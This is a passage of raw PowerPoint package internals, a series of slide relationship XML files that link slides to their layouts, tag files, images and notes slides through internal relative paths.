Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide289.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2721.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout121.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag107.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag106.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag105.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag104.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide290.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2731.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide291.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide29.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2741.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1126.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1125.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1124.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1123.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1122.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1121.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide292.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1135.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1134.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1133.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1132.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1131.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1130.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1129.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1128.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2751.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1139.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1138.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1137.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1136.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1127.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide293.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2762.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1142.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1141.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1140.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide294.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2772.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1145.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1144.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1143.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide295.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2781.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1149.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1148.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1147.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1146.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide296.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2791.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1154.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1153.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1152.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1151.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1150.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide297.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide30.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2801.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1158.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1157.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1156.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1155.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide298.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2811.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1162.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1161.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1160.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1159.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide299.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2821.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1166.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1165.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1164.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1163.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout131.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag111.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag110.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag109.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag108.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide300.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2831.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1170.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1169.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1168.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1167.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide301.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2841.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1174.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1173.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1172.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1171.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide302.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2851.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1175.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout141.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag115.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag114.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag113.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag112.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout151.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag119.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag118.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag117.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag116.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout161.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag123.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag122.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag121.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag120.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout171.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag127.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag126.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag125.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag124.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout181.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag131.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag130.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag129.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag128.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout191.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag135.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag134.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag133.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag132.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout201.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag139.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag138.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag137.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag136.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout211.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag143.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag142.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag141.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag140.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout221.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag147.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag146.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag145.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag144.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout231.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag151.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag150.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag149.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag148.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout241.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag155.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag154.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag153.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag152.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide42.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout251.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag159.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag158.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag157.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag156.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout261.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag163.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag162.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag161.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag160.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide44.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout271.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag167.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag166.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag165.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag164.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide45.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout281.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag171.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag170.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag169.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag168.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide46.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
